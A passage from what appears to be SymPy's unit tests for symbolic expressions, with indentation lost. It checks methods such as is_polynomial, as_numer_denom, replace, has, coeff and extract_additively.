assert (x**k).is_polynomial(k) is False
assert (x**x).is_polynomial(x) is False
assert (k**k).is_polynomial(k) is False
assert (k**x).is_polynomial(k) is False
assert (x**(-k)).is_polynomial(x) is False
assert ((2*x)**k).is_polynomial(x) is False
assert (x**2 + 3*x - 8).is_polynomial(x) is True
assert (x**2 + 3*x - 8).is_polynomial(y) is True
assert (x**2 + 3*x - 8).is_polynomial() is True
assert sqrt(x).is_polynomial(x) is False
assert (sqrt(x)**3).is_polynomial(x) is False
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(x) is True
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(y) is False
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial() is True
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial() is False
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial(x, y) is True
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial(x, y) is False
def test_is_rational_function():
assert Integer(1).is_rational_function() is True
assert Integer(1).is_rational_function(x) is True
assert Rational(17, 54).is_rational_function() is True
assert Rational(17, 54).is_rational_function(x) is True
assert (12/x).is_rational_function() is True
assert (12/x).is_rational_function(x) is True
assert (x/y).is_rational_function() is True
assert (x/y).is_rational_function(x) is True
assert (x/y).is_rational_function(x, y) is True
assert (x**2 + 1/x/y).is_rational_function() is True
assert (x**2 + 1/x/y).is_rational_function(x) is True
assert (x**2 + 1/x/y).is_rational_function(x, y) is True
assert (sin(y)/x).is_rational_function() is False
assert (sin(y)/x).is_rational_function(y) is False
assert (sin(y)/x).is_rational_function(x) is True
assert (sin(y)/x).is_rational_function(x, y) is False
def test_is_algebraic_expr():
assert sqrt(3).is_algebraic_expr(x) is True
assert sqrt(3).is_algebraic_expr() is True
eq = ((1 + x**2)/(1 - y**2))**(S(1)/3)
assert eq.is_algebraic_expr(x) is True
assert eq.is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(x) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr() is True
assert (cos(y)/sqrt(x)).is_algebraic_expr() is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x) is True
assert (cos(y)/sqrt(x)).is_algebraic_expr(y) is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x, y) is False
def test_SAGE1():
#see http://code.google.com/p/sympy/issues/detail?id=247
class MyInt:
def _sympy_(self):
return Integer(5)
m = MyInt()
e = Rational(2)*m
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE2():
class MyInt(object):
def __int__(self):
return 5
assert sympify(MyInt()) == 5
e = Rational(2)*MyInt()
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE3():
class MySymbol:
def __rmul__(self, other):
return ('mys', other, self)
o = MySymbol()
e = x*o
assert e == ('mys', x, o)
def test_len():
e = x*y
assert len(e.args) == 2
e = x + y + z
assert len(e.args) == 3
def test_doit():
a = Integral(x**2, x)
assert isinstance(a.doit(), Integral) is False
assert isinstance(a.doit(integrals=True), Integral) is False
assert isinstance(a.doit(integrals=False), Integral) is True
assert (2*Integral(x, x)).doit() == x**2
def test_attribute_error():
raises(AttributeError, lambda: x.cos())
raises(AttributeError, lambda: x.sin())
raises(AttributeError, lambda: x.exp())
def test_args():
assert (x*y).args in ((x, y), (y, x))
assert (x + y).args in ((x, y), (y, x))
assert (x*y + 1).args in ((x*y, 1), (1, x*y))
assert sin(x*y).args == (x*y,)
assert sin(x*y).args[0] == x*y
assert (x**y).args == (x, y)
assert (x**y).args[0] == x
assert (x**y).args[1] == y
def test_iter_basic_args():
assert list(sin(x*y).iter_basic_args()) == [x*y]
assert list((x**y).iter_basic_args()) == [x, y]
def test_noncommutative_expand_issue658():
A, B, C = symbols('A,B,C', commutative=False)
assert A*B - B*A != 0
assert (A*(A + B)*B).expand() == A**2*B + A*B**2
assert (A*(A + B + C)*B).expand() == A**2*B + A*B**2 + A*C*B
def test_as_numer_denom():
a, b, c = symbols('a, b, c')
assert nan.as_numer_denom() == (nan, 1)
assert oo.as_numer_denom() == (oo, 1)
assert (-oo).as_numer_denom() == (-oo, 1)
assert zoo.as_numer_denom() == (zoo, 1)
assert (-zoo).as_numer_denom() == (zoo, 1)
assert x.as_numer_denom() == (x, 1)
assert (1/x).as_numer_denom() == (1, x)
assert (x/y).as_numer_denom() == (x, y)
assert (x/2).as_numer_denom() == (x, 2)
assert (x*y/z).as_numer_denom() == (x*y, z)
assert (x/(y*z)).as_numer_denom() == (x, y*z)
assert Rational(1, 2).as_numer_denom() == (1, 2)
assert (1/y**2).as_numer_denom() == (1, y**2)
assert (x/y**2).as_numer_denom() == (x, y**2)
assert ((x**2 + 1)/y).as_numer_denom() == (x**2 + 1, y)
assert (x*(y + 1)/y**7).as_numer_denom() == (x*(y + 1), y**7)
assert (x**-2).as_numer_denom() == (1, x**2)
assert (a/x + b/2/x + c/3/x).as_numer_denom() == \
(6*a + 3*b + 2*c, 6*x)
assert (a/x + b/2/x + c/3/y).as_numer_denom() == \
(2*c*x + y*(6*a + 3*b), 6*x*y)
assert (a/x + b/2/x + c/.5/x).as_numer_denom() == \
(2*a + b + 4.0*c, 2*x)
# this should take no more than a few seconds
assert int(log(Add(*[Dummy()/i/x for i in xrange(1, 705)]
).as_numer_denom()[1]/x).n(4)) == 705
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).as_numer_denom() == \
(x + i, 3)
assert (S.Infinity + x/3 + y/4).as_numer_denom() == \
(4*x + 3*y + S.Infinity, 12)
assert (oo*x + zoo*y).as_numer_denom() == \
(zoo*y + oo*x, 1)
A, B, C = symbols('A,B,C', commutative=False)
assert (A*B*C**-1).as_numer_denom() == (A*B*C**-1, 1)
assert (A*B*C**-1/x).as_numer_denom() == (A*B*C**-1, x)
assert (C**-1*A*B).as_numer_denom() == (C**-1*A*B, 1)
assert (C**-1*A*B/x).as_numer_denom() == (C**-1*A*B, x)
assert ((A*B*C)**-1).as_numer_denom() == ((A*B*C)**-1, 1)
assert ((A*B*C)**-1/x).as_numer_denom() == ((A*B*C)**-1, x)
def test_as_independent():
assert (2*x*sin(x) + y + x).as_independent(x) == (y, x + 2*x*sin(x))
assert (2*x*sin(x) + y + x).as_independent(y) == (x + 2*x*sin(x), y)
assert (2*x*sin(x) + y + x).as_independent(x, y) == (0, y + x + 2*x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(x) == (cos(y), x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(y) == (x*sin(x), cos(y))
assert (x*sin(x)*cos(y)).as_independent(x, y) == (1, x*sin(x)*cos(y))
assert (sin(x)).as_independent(x) == (1, sin(x))
assert (sin(x)).as_independent(y) == (sin(x), 1)
assert (2*sin(x)).as_independent(x) == (2, sin(x))
assert (2*sin(x)).as_independent(y) == (2*sin(x), 1)
# issue 1804 = 1766b
n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
assert (n1 + n1*n2).as_independent(n2) == (n1, n1*n2)
assert (n2*n1 + n1*n2).as_independent(n2) == (0, n1*n2 + n2*n1)
assert (n1*n2*n1).as_independent(n2) == (n1, n2*n1)
assert (n1*n2*n1).as_independent(n1) == (1, n1*n2*n1)
assert (3*x).as_independent(x, as_Add=True) == (0, 3*x)
assert (3*x).as_independent(x, as_Add=False) == (3, x)
assert (3 + x).as_independent(x, as_Add=True) == (3, x)
assert (3 + x).as_independent(x, as_Add=False) == (1, 3 + x)
# issue 2380
assert (3*x).as_independent(Symbol) == (3, x)
# issue 2549
assert (n1*x*y).as_independent(x) == (n1*y, x)
assert ((x + n1)*(x - y)).as_independent(x) == (1, (x + n1)*(x - y))
assert ((x + n1)*(x - y)).as_independent(y) == (x + n1, x - y)
assert (DiracDelta(x - n1)*DiracDelta(x - y)).as_independent(x) \
== (1, DiracDelta(x - n1)*DiracDelta(x - y))
assert (x*y*n1*n2*n3).as_independent(n2) == (x*y*n1, n2*n3)
assert (x*y*n1*n2*n3).as_independent(n1) == (x*y, n1*n2*n3)
assert (x*y*n1*n2*n3).as_independent(n3) == (x*y*n1*n2, n3)
assert (DiracDelta(x - n1)*DiracDelta(y - n1)*DiracDelta(x - n2)).as_independent(y) == \
(DiracDelta(x - n1)*DiracDelta(x - n2), DiracDelta(y - n1))
# issue 2685
assert (x + Integral(x, (x, 1, 2))).as_independent(x, strict=True) == \
(Integral(x, (x, 1, 2)), x)
def test_call():
# See the long history of this in issues 1927 and 2006.
raises(TypeError, lambda: sin(x)({ x : 1, sin(x) : 2}))
raises(TypeError, lambda: sin(x)(1))
# No effect as there are no callables
assert sin(x).rcall(1) == sin(x)
assert (1 + sin(x)).rcall(1) == 1 + sin(x)
    # Effect in the presence of callables
l = Lambda(x, 2*x)
assert (l + x).rcall(y) == 2*y + x
assert (x**l).rcall(2) == x**4
# TODO UndefinedFunction does not subclass Expr
#f = Function('f')
#assert (2*f)(x) == 2*f(x)
def test_replace():
f = log(sin(x)) + tan(sin(x**2))
assert f.replace(sin, cos) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin, lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
a = Wild('a')
b = Wild('b')
assert f.replace(sin(a), cos(a)) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin(a), lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
# test exact
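    # (a plausible reading, per the assertions below: with exact=True the
    # Wilds must take non-degenerate values -- here b would have to be 0 --
    # so 2*x is returned unchanged)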
assert (2*x).replace(a*x + b, b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, b - a) == 2/x
assert (2*x).replace(a*x + b, lambda a, b: b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, lambda a, b: b - a) == 2/x
g = 2*sin(x**3)
assert g.replace(
lambda expr: expr.is_Number, lambda expr: expr**2) == 4*sin(x**9)
assert cos(x).replace(cos, sin, map=True) == (sin(x), {cos(x): sin(x)})
assert sin(x).replace(cos, sin) == sin(x)
cond, func = lambda x: x.is_Mul, lambda x: 2*x
assert (x*y).replace(cond, func, map=True) == (2*x*y, {x*y: 2*x*y})
assert (x*(1 + x*y)).replace(cond, func, map=True) == \
(2*x*(2*x*y + 1), {x*(2*x*y + 1): 2*x*(2*x*y + 1), x*y: 2*x*y})
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y, map=True) == \
(sin(x), {sin(x): sin(x)/y})
# if not simultaneous then y*sin(x) -> y*sin(x)/y = sin(x) -> sin(x)/y
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y,
simultaneous=False) == sin(x)/y
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e) == O(1, x)
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e,
simultaneous=False) == x**2/2 + O(x**3)
assert (x*(x*y + 3)).replace(lambda x: x.is_Mul, lambda x: 2 + x) == \
x*(x*y + 5) + 2
e = (x*y + 1)*(2*x*y + 1) + 1
assert e.replace(cond, func, map=True) == (
2*((2*x*y + 1)*(4*x*y + 1)) + 1,
{2*x*y: 4*x*y, x*y: 2*x*y, (2*x*y + 1)*(4*x*y + 1):
2*((2*x*y + 1)*(4*x*y + 1))})
assert x.replace(x, y) == y
assert (x + 1).replace(1, 2) == x + 2
def test_find():
expr = (x + y + 2 + sin(3*x))
assert expr.find(lambda u: u.is_Integer) == set([S(2), S(3)])
assert expr.find(lambda u: u.is_Symbol) == set([x, y])
assert expr.find(lambda u: u.is_Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(lambda u: u.is_Symbol, group=True) == {x: 2, y: 1}
assert expr.find(Integer) == set([S(2), S(3)])
assert expr.find(Symbol) == set([x, y])
assert expr.find(Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(Symbol, group=True) == {x: 2, y: 1}
a = Wild('a')
expr = sin(sin(x)) + sin(x) + cos(x) + x
assert expr.find(lambda u: type(u) is sin) == set([sin(x), sin(sin(x))])
assert expr.find(
lambda u: type(u) is sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin(a)) == set([sin(x), sin(sin(x))])
assert expr.find(sin(a), group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin) == set([sin(x), sin(sin(x))])
assert expr.find(sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
def test_count():
expr = (x + y + 2 + sin(3*x))
assert expr.count(lambda u: u.is_Integer) == 2
assert expr.count(lambda u: u.is_Symbol) == 3
assert expr.count(Integer) == 2
assert expr.count(Symbol) == 3
assert expr.count(2) == 1
a = Wild('a')
assert expr.count(sin) == 1
assert expr.count(sin(a)) == 1
assert expr.count(lambda u: type(u) is sin) == 1
def test_has_basics():
f = Function('f')
g = Function('g')
p = Wild('p')
assert sin(x).has(x)
assert sin(x).has(sin)
assert not sin(x).has(y)
assert not sin(x).has(cos)
assert f(x).has(x)
assert f(x).has(f)
assert not f(x).has(y)
assert not f(x).has(g)
assert f(x).diff(x).has(x)
assert f(x).diff(x).has(f)
assert f(x).diff(x).has(Derivative)
assert not f(x).diff(x).has(y)
assert not f(x).diff(x).has(g)
assert not f(x).diff(x).has(sin)
assert (x**2).has(Symbol)
assert not (x**2).has(Wild)
assert (2*p).has(Wild)
assert not x.has()
def test_has_multiple():
f = x**2*y + sin(2**t + log(z))
assert f.has(x)
assert f.has(y)
assert f.has(z)
assert f.has(t)
assert not f.has(u)
assert f.has(x, y, z, t)
assert f.has(x, y, z, t, u)
i = Integer(4400)
assert not i.has(x)
assert (i*x**i).has(x)
assert not (i*y**i).has(x)
assert (i*y**i).has(x, y)
assert not (i*y**i).has(x, z)
def test_has_piecewise():
f = (x*y + 3/y)**(3 + 2)
g = Function('g')
h = Function('h')
p = Piecewise((g(x), x < -1), (1, x <= 1), (f, True))
assert p.has(x)
assert p.has(y)
assert not p.has(z)
assert p.has(1)
assert p.has(3)
assert not p.has(4)
assert p.has(f)
assert p.has(g)
assert not p.has(h)
def test_has_iterative():
A, B, C = symbols('A,B,C', commutative=False)
f = x*gamma(x)*sin(x)*exp(x*y)*A*B*C*cos(x*A*B)
assert f.has(x)
assert f.has(x*y)
assert f.has(x*sin(x))
assert not f.has(x*sin(y))
assert f.has(x*A)
assert f.has(x*A*B)
assert not f.has(x*A*C)
assert f.has(x*A*B*C)
assert not f.has(x*A*C*B)
assert f.has(x*sin(x)*A*B*C)
assert not f.has(x*sin(x)*A*C*B)
assert not f.has(x*sin(y)*A*B*C)
assert f.has(x*gamma(x))
assert not f.has(x + sin(x))
assert (x & y & z).has(x & z)
def test_has_integrals():
f = Integral(x**2 + sin(x*y*z), (x, 0, x + y + z))
assert f.has(x + y)
assert f.has(x + z)
assert f.has(y + z)
assert f.has(x*y)
assert f.has(x*z)
assert f.has(y*z)
assert not f.has(2*x + y)
assert not f.has(2*x*y)
def test_has_tuple():
f = Function('f')
g = Function('g')
h = Function('h')
assert Tuple(x, y).has(x)
assert not Tuple(x, y).has(z)
assert Tuple(f(x), g(x)).has(x)
assert not Tuple(f(x), g(x)).has(y)
assert Tuple(f(x), g(x)).has(f)
assert Tuple(f(x), g(x)).has(f(x))
assert not Tuple(f, g).has(x)
assert Tuple(f, g).has(f)
assert not Tuple(f, g).has(h)
assert Tuple(True).has(True) is True # .has(1) will also be True
def test_has_units():
from sympy.physics.units import m, s
assert (x*m/s).has(x)
assert (x*m/s).has(y, z) is False
def test_has_polys():
poly = Poly(x**2 + x*y*sin(z), x, y, t)
assert poly.has(x)
assert poly.has(x, y, z)
assert poly.has(x, y, z, t)
def test_has_physics():
assert FockState((x, y)).has(x)
def test_as_poly_as_expr():
f = x**2 + 2*x*y
assert f.as_poly().as_expr() == f
assert f.as_poly(x, y).as_expr() == f
assert (f + sin(x)).as_poly(x, y) is None
p = Poly(f, x, y)
assert p.as_poly() == p
def test_nonzero():
assert bool(S.Zero) is False
assert bool(S.One) is True
assert bool(x) is True
assert bool(x + y) is True
assert bool(x - x) is False
assert bool(x*y) is True
assert bool(x*1) is True
assert bool(x*0) is False
def test_is_number():
assert Float(3.14).is_number is True
assert Integer(737).is_number is True
assert Rational(3, 2).is_number is True
assert Rational(8).is_number is True
assert x.is_number is False
assert (2*x).is_number is False
assert (x + y).is_number is False
assert log(2).is_number is True
assert log(x).is_number is False
assert (2 + log(2)).is_number is True
assert (8 + log(2)).is_number is True
assert (2 + log(x)).is_number is False
assert (8 + log(2) + x).is_number is False
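    # x**2/x - x cancels to 0 on construction, leaving just the number 1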
assert (1 + x**2/x - x).is_number is True
assert Tuple(Integer(1)).is_number is False
assert Add(2, x).is_number is False
assert Mul(3, 4).is_number is True
assert Pow(log(2), 2).is_number is True
assert oo.is_number is True
g = WildFunction('g')
assert g.is_number is False
assert (2*g).is_number is False
assert (x**2).subs(x, 3).is_number is True
    # test extensibility of .is_number
    # on subclasses of Basic
class A(Basic):
pass
a = A()
assert a.is_number is False
def test_as_coeff_add():
assert S(2).as_coeff_add() == (2, ())
assert S(3.0).as_coeff_add() == (0, (S(3.0),))
assert S(-3.0).as_coeff_add() == (0, (S(-3.0),))
assert x.as_coeff_add() == (0, (x,))
assert (x - 1).as_coeff_add() == (-1, (x,))
assert (x + 1).as_coeff_add() == (1, (x,))
assert (x + 2).as_coeff_add() == (2, (x,))
assert (x + y).as_coeff_add(y) == (x, (y,))
assert (3*x).as_coeff_add(y) == (3*x, ())
# don't do expansion
e = (x + y)**2
assert e.as_coeff_add(y) == (0, (e,))
def test_as_coeff_mul():
assert S(2).as_coeff_mul() == (2, ())
assert S(3.0).as_coeff_mul() == (1, (S(3.0),))
assert S(-3.0).as_coeff_mul() == (-1, (S(3.0),))
assert x.as_coeff_mul() == (1, (x,))
assert (-x).as_coeff_mul() == (-1, (x,))
assert (2*x).as_coeff_mul() == (2, (x,))
assert (x*y).as_coeff_mul(y) == (x, (y,))
assert (3 + x).as_coeff_mul(y) == (3 + x, ())
# don't do expansion
e = exp(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
e = 2**(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
def test_as_coeff_exponent():
assert (3*x**4).as_coeff_exponent(x) == (3, 4)
assert (2*x**3).as_coeff_exponent(x) == (2, 3)
assert (4*x**2).as_coeff_exponent(x) == (4, 2)
assert (6*x**1).as_coeff_exponent(x) == (6, 1)
assert (3*x**0).as_coeff_exponent(x) == (3, 0)
assert (2*x**0).as_coeff_exponent(x) == (2, 0)
assert (1*x**0).as_coeff_exponent(x) == (1, 0)
assert (0*x**0).as_coeff_exponent(x) == (0, 0)
assert (-1*x**0).as_coeff_exponent(x) == (-1, 0)
assert (-2*x**0).as_coeff_exponent(x) == (-2, 0)
assert (2*x**3 + pi*x**3).as_coeff_exponent(x) == (2 + pi, 3)
assert (x*log(2)/(2*x + pi*x)).as_coeff_exponent(x) == \
(log(2)/(2 + pi), 0)
# 1685
D = Derivative
f = Function('f')
fx = D(f(x), x)
assert fx.as_coeff_exponent(f(x)) == (fx, 0)
def test_extractions():
assert ((x*y)**3).extract_multiplicatively(x**2 * y) == x*y**2
assert ((x*y)**3).extract_multiplicatively(x**4 * y) is None
assert (2*x).extract_multiplicatively(2) == x
assert (2*x).extract_multiplicatively(3) is None
assert (2*x).extract_multiplicatively(-1) is None
assert (Rational(1, 2)*x).extract_multiplicatively(3) == x/6
assert (sqrt(x)).extract_multiplicatively(x) is None
assert (sqrt(x)).extract_multiplicatively(1/x) is None
assert ((x*y)**3).extract_additively(1) is None
assert (x + 1).extract_additively(x) == 1
assert (x + 1).extract_additively(2*x) is None
assert (x + 1).extract_additively(-x) is None
assert (-x + 1).extract_additively(2*x) is None
assert (2*x + 3).extract_additively(x) == x + 3
assert (2*x + 3).extract_additively(2) == 2*x + 1
assert (2*x + 3).extract_additively(3) == 2*x
assert (2*x + 3).extract_additively(-2) is None
assert (2*x + 3).extract_additively(3*x) is None
assert (2*x + 3).extract_additively(2*x) == 3
assert x.extract_additively(0) == x
assert S(2).extract_additively(x) is None
assert S(2.).extract_additively(2) == S.Zero
assert S(2*x + 3).extract_additively(x + 1) == x + 2
assert S(2*x + 3).extract_additively(y + 1) is None
assert S(2*x - 3).extract_additively(x + 1) is None
assert S(2*x - 3).extract_additively(y + z) is None
assert ((a + 1)*x*4 + y).extract_additively(x).expand() == \
4*a*x + 3*x + y
assert ((a + 1)*x*4 + 3*y).extract_additively(x + 2*y).expand() == \
4*a*x + 3*x + y
assert (y*(x + 1)).extract_additively(x + 1) is None
assert ((y + 1)*(x + 1) + 3).extract_additively(x + 1) == \
y*(x + 1) + 3
assert ((x + y)*(x + 1) + x + y + 3).extract_additively(x + y) == \
x*(x + y) + 3
assert (x + y + 2*((x + y)*(x + 1)) + 3).extract_additively((x + y)*(x + 1)) == \
x + y + (x + 1)*(x + y) + 3
assert ((y + 1)*(x + 2*y + 1) + 3).extract_additively(y + 1) == \
(x + 2*y)*(y + 1) + 3
n = Symbol("n", integer=True)
assert (Integer(-3)).could_extract_minus_sign() is True
assert (-n*x + x).could_extract_minus_sign() != \
(n*x - x).could_extract_minus_sign()
assert (x - y).could_extract_minus_sign() != \
(-x + y).could_extract_minus_sign()
assert (1 - x - y).could_extract_minus_sign() is True
assert (1 - x + y).could_extract_minus_sign() is False
assert ((-x - x*y)/y).could_extract_minus_sign() is True
assert (-(x + x*y)/y).could_extract_minus_sign() is True
assert ((x + x*y)/(-y)).could_extract_minus_sign() is True
assert ((x + x*y)/y).could_extract_minus_sign() is False
assert (x*(-x - x**3)).could_extract_minus_sign() is True
assert ((-x - y)/(x + y)).could_extract_minus_sign() is True
    # The results of each of these will vary on different machines; e.g.,
    # the first might be False and the other True, or vice versa, so both
    # alternatives are included.
assert ((-x - y)/(x - y)).could_extract_minus_sign() is False or \
((-x - y)/(y - x)).could_extract_minus_sign() is False
assert (x - y).could_extract_minus_sign() is False
assert (-x + y).could_extract_minus_sign() is True
def test_coeff():
assert (x + 1).coeff(x + 1) == 1
assert (3*x).coeff(0) == 0
assert (z*(1 + x)*x**2).coeff(1 + x) == z*x**2
assert (1 + 2*x*x**(1 + x)).coeff(x*x**(1 + x)) == 2
assert (1 + 2*x**(y + z)).coeff(x**(y + z)) == 2
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (3 + 2*x + 4*x**2).coeff(-1) == 0
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (-x/8 + x*y).coeff(x) == -S(1)/8 + y
assert (-x/8 + x*y).coeff(-x) == S(1)/8
assert (4*x).coeff(2*x) == 0
assert (2*x).coeff(2*x) == 1
assert (-oo*x).coeff(x*oo) == -1
n1, n2 = symbols('n1 n2', commutative=False)
assert (n1*n2).coeff(n1) == 1
assert (n1*n2).coeff(n2) == n1
assert (n1*n2 + x*n1).coeff(n1) == 1 # 1*n1*(n2+x)
assert (n2*n1 + x*n1).coeff(n1) == n2 + x
assert (n2*n1 + x*n1**2).coeff(n1) == n2
assert (n1**x).coeff(n1) == 0
assert (n1*n2 + n2*n1).coeff(n1) == 0
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=1) == n2
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=0) == 2
f = Function('f')
assert (2*f(x) + 3*f(x).diff(x)).coeff(f(x)) == 2
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr.coeff(x + y) == 0
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
assert (x + y + 3*z).coeff(1) == x + y
assert (-x + 2*y).coeff(-1) == x
assert (x - 2*y).coeff(-1) == 2*y
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (-x - 2*y).coeff(2) == -y
assert (x + sqrt(2)*x).coeff(sqrt(2)) == x
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (z*(x + y)**2).coeff((x + y)**2) == z
assert (z*(x + y)**2).coeff(x + y) == 0
assert (2 + 2*x + (x + 1)*y).coeff(x + 1) == y
assert (x + 2*y + 3).coeff(1) == x
assert (x + 2*y + 3).coeff(x, 0) == 2*y + 3
assert (x**2 + 2*y + 3*x).coeff(x**2, 0) == 2*y + 3*x
assert x.coeff(0, 0) == 0
assert x.coeff(x, 0) == 0
n, m, o, l = symbols('n m o l', commutative=False)
assert n.coeff(n) == 1
assert y.coeff(n) == 0
assert (3*n).coeff(n) == 3
assert (2 + n).coeff(x*m) == 0
assert (2*x*n*m).coeff(x) == 2*n*m
assert (2 + n).coeff(x*m*n + y) == 0
assert (2*x*n*m).coeff(3*n) == 0
assert (n*m + m*n*m).coeff(n) == 1 + m
assert (n*m + m*n*m).coeff(n, right=True) == m # = (1 + m)*n*m
assert (n*m + m*n).coeff(n) == 0
assert (n*m + o*m*n).coeff(m*n) == o
assert (n*m + o*m*n).coeff(m*n, right=1) == 1
assert (n*m + n*m*n).coeff(n*m, right=1) == 1 + n # = n*m*(n + 1)
def test_coeff2():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff((psi(r).diff(r))) == 2/r
def test_coeff2_0():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff(psi(r).diff(r, 2)) == 1
def test_coeff_expand():
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
def test_integrate():
assert x.integrate(x) == x**2/2
assert x.integrate((x, 0, 1)) == S(1)/2
def test_as_base_exp():
assert x.as_base_exp() == (x, S.One)
assert (x*y*z).as_base_exp() == (x*y*z, S.One)
assert (x + y + z).as_base_exp() == (x + y + z, S.One)
assert ((x + y)**z).as_base_exp() == (x + y, z)
def test_issue1864():
assert hasattr(Mul(x, y), "is_commutative")
assert hasattr(Mul(x, y, evaluate=False), "is_commutative")
assert hasattr(Pow(x, y), "is_commutative")
assert hasattr(Pow(x, y, evaluate=False), "is_commutative")
expr = Mul(Pow(2, 2, evaluate=False), 3, evaluate=False) + 1
assert hasattr(expr, "is_commutative")
def test_action_verbs():
assert nsimplify((1/(exp(3*pi*x/5) + 1))) == \
(1/(exp(3*pi*x/5) + 1)).nsimplify()
assert ratsimp(1/x + 1/y) == (1/x + 1/y).ratsimp()
assert trigsimp(log(x), deep=True) == (log(x)).trigsimp(deep=True)
assert radsimp(1/(2 + sqrt(2))) == (1/(2 + sqrt(2))).radsimp()
assert powsimp(x**y*x**z*y**z, combine='all') == \
(x**y*x**z*y**z).powsimp(combine='all')
assert simplify(x**y*x**z*y**z) == (x**y*x**z*y**z).simplify()
assert together(1/x + 1/y) == (1/x + 1/y).together()
# Not tested because it's deprecated
#assert separate((x*(y*z)**3)**2) == ((x*(y*z)**3)**2).separate()
assert collect(a*x**2 + b*x**2 + a*x - b*x + c, x) == \
(a*x**2 + b*x**2 + a*x - b*x + c).collect(x)
assert apart(y/(y + 2)/(y + 1), y) == (y/(y + 2)/(y + 1)).apart(y)
assert combsimp(y/(x + 2)/(x + 1)) == (y/(x + 2)/(x + 1)).combsimp()
assert factor(x**2 + 5*x + 6) == (x**2 + 5*x + 6).factor()
assert refine(sqrt(x**2)) == sqrt(x**2).refine()
assert cancel((x**2 + 5*x + 6)/(x + 2)) == ((x**2 + 5*x + 6)/(x + 2)).cancel()
def test_as_powers_dict():
assert x.as_powers_dict() == {x: 1}
assert (x**y*z).as_powers_dict() == {x: y, z: 1}
assert Mul(2, 2, evaluate=False).as_powers_dict() == {S(2): S(2)}
assert (x*y).as_powers_dict()[z] == 0
assert (x + y).as_powers_dict()[z] == 0
def test_as_coefficients_dict():
check = [S(1), x, y, x*y, 1]
assert [Add(3*x, 2*x, y, 3).as_coefficients_dict()[i] for i in check] == \
[3, 5, 1, 0, 0]
assert [(3*x*y).as_coefficients_dict()[i] for i in check] == \
[0, 0, 0, 3, 0]
assert (3.0*x*y).as_coefficients_dict()[3.0*x*y] == 1
def test_args_cnc():
A = symbols('A', commutative=False)
assert (x + A).args_cnc() == \
[[], [x + A]]
assert (x + a).args_cnc() == \
[[a + x], []]
assert (x*a).args_cnc() == \
[[a, x], []]
assert (x*y*A*(A + 1)).args_cnc(cset=True) == \
[set([x, y]), [A, 1 + A]]
assert Mul(x, x, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x]), []]
assert Mul(x, x**2, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x, x**2]), []]
raises(ValueError, lambda: Mul(x, x, evaluate=False).args_cnc(cset=True))
assert Mul(x, y, x, evaluate=False).args_cnc() == \
[[x, y, x], []]
# always split -1 from leading number
assert (-1.*x).args_cnc() == [[-1, 1.0, x], []]
def test_new_rawargs():
n = Symbol('n', commutative=False)
a = x + n
assert a.is_commutative is False
assert a._new_rawargs(x).is_commutative
assert a._new_rawargs(x, y).is_commutative
assert a._new_rawargs(x, n).is_commutative is False
assert a._new_rawargs(x, y, n).is_commutative is False
m = x*n
assert m.is_commutative is False
assert m._new_rawargs(x).is_commutative
assert m._new_rawargs(n).is_commutative is False
assert m._new_rawargs(x, y).is_commutative
assert m._new_rawargs(x, n).is_commutative is False
